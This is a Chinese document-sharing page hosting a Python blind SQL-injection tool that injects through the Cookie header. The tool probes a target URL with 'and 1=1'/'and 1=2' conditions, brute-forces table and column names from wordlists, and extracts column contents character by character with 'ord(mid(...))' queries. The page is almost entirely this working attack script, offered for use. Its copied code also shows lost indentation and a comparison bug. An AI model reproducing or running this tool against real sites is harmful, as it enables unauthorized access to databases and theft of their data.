您的位置:360文档中心› cookie注入脚本

cookie注入脚本

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

cookie注⼊脚本
1import urllib.request
2import urllib.parse
3import urllib.error
4import http.cookiejar
5import argparse
6
7# url='http://172.20.10.8/bug/cookie.php'
8 url = argparse.ArgumentParser()
9 url.add_argument('-u',help="-u http://localhost/cookie.php",type=str)
10 url.add_argument('-cookie',help="-cookie id=xxx",type=str)
11 args = url.parse_args()
12 url = args.u
13 cookie = args.cookie
14 grey = '''
15*****************************************************
16
17 SQL mysql_cookie 注⼊⼯具
18作者:Grey_Network
19
20*****************************************************
21'''
22
23print(grey)
24
25 a = "%20and%201=1"
26 b = "%20and%201=2"
27 header={
28'User-Agent':'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
29'Referer':url,
30'Cookie':cookie
31 }
32 headera={
33'User-Agent':'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
34'Referer':url,
35'Cookie':cookie+a
36 }
37 headerb={
38'User-Agent':'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
39'Referer':url,
40'Cookie':cookie+b
41 }
42 sqlurl = urllib.request.Request(url,headers=header)
43 sqlurl1 = urllib.request.urlopen(sqlurl).read()
44 sqla = urllib.request.Request(url,headers=headera)
45 sqla1 = urllib.request.urlopen(sqla).read()
46 sqlb = urllib.request.Request(url,headers=headerb)
47 sqlb1 = urllib.request.urlopen(sqlb).read()
48
49
50if sqlurl1 == sqla1 and sqlurl !=sqlb1:
51 table= input("Whether or not the scan table ? Y/n > ")
52 dirt = "table.txt"
53 webdirt=[]
54 with open(dirt) as infile:
55while True:
56 dirdict = infile.readline().strip()
57if (len(dirdict) == 0): break
58 webdirt.append(dirdict)
59if table == "y":
60for line in webdirt:
61 headert = {
62'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36', 63'Referer': url,
64'Cookie': cookie + "%20and%20exists%20(select%20*%20from%20" + line + ")"
65 }
66 table_scan = urllib.request.Request(url,headers=headert)
67 table_scan1 = urllib.request.urlopen(table_scan).read()
68if table_scan1 == sqla1 and table_scan1 !=sqlb1:
69print("table:\n",line)
70 column = input("Whether to scan the field ? Y/n > ")
71 table_file = input("table > ")
72 dirc = "column.txt"
73 webdirc = []
74 with open(dirc) as infilec:
75while True:
76 dirdicc = infilec.readline().strip()
77if (len(dirdicc) == 0): break
78 webdirc.append(dirdicc)
79if column == "y":
80for linec in webdirc:
81 headerc = {
82'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
83'Referer': url,
84'Cookie': cookie + "%20and%20exists%20(select%20"+linec+"%20from%20" + table_file + ")"
85 }
86 column_scan = urllib.request.Request(url, headers=headerc)
87 column_scan1 = urllib.request.urlopen(column_scan).read()
88if column_scan1 == sqla1 and column_scan1 != sqlb1:
89print("column:\n", linec)
90 c1 = input("Do you start guessing ? Y/n > ")
91 column_file = input("column > ")
92if c1 == "y":
93 o = 0
94while(o<100):
95 o = o+1
96 oc = str(o)
97 headerc1 = {
98'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
99'Referer': url,
100'Cookie': cookie + "%20and%20length("+column_file+")="+oc
101 }
102 c1_scan = urllib.request.Request(url,headers=headerc1)
103 c1_scan1 = urllib.request.urlopen(c1_scan).read()
104if c1_scan1 == sqla1 and c1_scan1 != sqlb1:
105
106 ca1=0
107while(ca1<int(oc)):
108 ca1=ca1+1
109 cac1=str(ca1)
110 ca2=0
111while(ca2<128):
112 ca2=ca2+1
113 cac2 = str(ca2)
114 headerca1 = {
115'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36', 116'Referer': url,
117'Cookie': cookie + "%20and%20ord(mid("+column_file+","+cac1+",1))="+cac2
118 }
119 ca1_scan = urllib.request.Request(url,headers=headerca1)
120 ca1_scan1 = urllib.request.urlopen(ca1_scan).read()
121if ca1_scan1 == sqla1 and ca1_scan1 != sqlb1:
122 data_dump = chr(int(cac2))
123print(data_dump)
124else:
125print("很遗憾,⽆法注⼊")。

相关文档
最新文档